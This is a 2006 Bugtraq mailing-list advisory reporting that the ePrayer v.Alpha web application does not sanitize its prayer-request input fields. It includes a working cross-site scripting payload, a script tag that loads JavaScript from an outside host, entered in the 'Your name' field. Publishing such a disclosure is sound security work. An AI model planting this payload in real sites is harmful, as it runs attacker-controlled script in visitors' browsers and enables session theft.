[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ePrayver v.Alpha - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ePrayver v.Alpha - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 14 Jun 2006 21:36:55 -0000

Eprayer v.Alpha.

Homepage:
http://eprayer.sourceforge.net

Affected files:

input boxs of prayer request.

User submitted data is not sanatized before being dynamically generated. Try 
putting the code below in as "Your name"

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshots:

http://www.youfucktard.com/xsp/eprayer1.jpg
http://www.youfucktard.com/xsp/eprayer2.jpg

Prev by Date: Re: Amr Talkbox talkbox.PHP - Remote File Include Vulnerabilities
Next by Date: APBoard 2.2-r3 <= SQL Injections
Previous by thread: [USN-300-1] wv2 vulnerability
Next by thread: APBoard 2.2-r3 <= SQL Injections
Index(es):
- Date
- Thread